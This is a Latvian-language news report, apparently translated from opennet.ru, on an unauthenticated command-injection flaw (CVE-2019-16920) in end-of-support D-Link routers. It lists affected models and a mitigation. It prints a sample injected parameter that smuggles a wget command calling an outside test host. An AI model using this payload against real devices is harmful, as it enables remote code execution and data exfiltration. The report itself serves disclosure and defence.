Attālināti izmantojama ievainojamība D-Link maršrutētājos

D-Link bezvadu maršrutētājos identificēts bīstama ievainojamība (CVE-2019-16920), kas ļauj attālināti izpildīt kodu ierīces pusē, nosūtot īpašu pieprasījumu “ping_test” apstrādātājam, kas pieejams bez autentifikācijas.

Interesanti, ka, pēc programmaparatūras izstrādātāju domām, “ping_test” izsaukums ir jāizpilda tikai pēc autentifikācijas, taču patiesībā tas tiek izsaukts jebkurā gadījumā, neatkarīgi no pieteikšanās tīmekļa saskarnē. Jo īpaši, piekļūstot skriptam apply_sec.cgi un nododot parametru “action=ping_test”, skripts novirza uz autentifikācijas lapu, bet tajā pašā laikā veic darbību, kas saistīta ar ping_test. Lai izpildītu kodu, pašā ping_test tika izmantota cita ievainojamība, kas izsauc ping utilītu, pienācīgi nepārbaudot testēšanai nosūtītās IP adreses pareizību. Piemēram, lai izsauktu utilītu wget un komandas “echo 1234” rezultātus pārsūtītu uz ārēju resursdatoru, vienkārši norādiet parametru “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Attālināti izmantojama ievainojamība D-Link maršrutētājos

Ievainojamības esamība ir oficiāli apstiprināta šādos modeļos:

  • DIR-655 ar programmaparatūru 3.02b05 vai vecāku;
  • DIR-866L ar programmaparatūru 1.03b04 vai vecāku;
  • DIR-1565 ar programmaparatūru 1.01 vai vecāku;
  • DIR-652 (informācija par problemātiskām programmaparatūras versijām netiek sniegta)

Atbalsta periods šiem modeļiem jau ir beidzies, tāpēc D-Link teica, kas neizlaidīs tiem atjauninājumus, lai novērstu ievainojamību, neiesaka tos izmantot un iesaka tos aizstāt ar jaunām ierīcēm. Kā drošības risinājums varat ierobežot piekļuvi tīmekļa saskarnei tikai ar uzticamām IP adresēm.

Vēlāk tika atklāts, ka arī ievainojamība bija ietekmē modeļi DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 un DIR-825, kuru atjauninājumu izlaišanas plāni vēl nav zināmi.

Avots: opennet.ru

Pievieno komentāru